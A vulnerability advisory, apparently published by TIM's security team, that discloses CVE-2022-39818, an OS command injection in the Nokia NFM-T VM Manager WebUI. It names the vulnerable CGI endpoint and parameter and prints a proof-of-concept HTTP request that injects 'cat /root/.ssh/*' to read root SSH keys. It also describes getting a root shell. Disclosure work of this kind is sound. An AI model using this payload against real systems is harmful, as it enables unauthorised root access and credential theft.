La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2022-39818

CVE-2022-39818 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') – CWE-78

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39818

CVSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows any authenticated user to execute commands on the Operating System.

 

Step-by-step instructions and PoC

The Web application, and to be more precise the module that manages the VM element (qemu Webui), does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, that allows an attacker to replace and inject arbitrary system commands with the root privileges of the application user.

Affected Endpoints

·       URL: https://[...]/cgi-bin/R19.9/log.pl

Parameter:

·       HTTP GET: cmd

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&c=22SHOWCA&runfrom=/var/autoinstall/R19.9&cmd=cat%20/root/.ssh/* HTTP/1.1

Host: [...]

Cookie: XSRF=618627

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept-Encoding: gzip, deflate

Authorization: Basic [...]

Referer: https://[...]/cgi-bin/R19.9/actions.pl?session=KALEVO19

Connection: close

 

This first step consists of replacing the command in the “cmd” GET parameter whit the chosen one to execute the command:

Then, if needed, the output of the command can be read in the specified log file in the previous request “/tmp/.AIClogger-KALEVO19-log12065.log”:

Security Impact

By exploiting the lack of validation mechanisms in the Web app, it was possible to obtain, through the execution of arbitrary commands, a shell for remote control of the endpoint with the root privileges.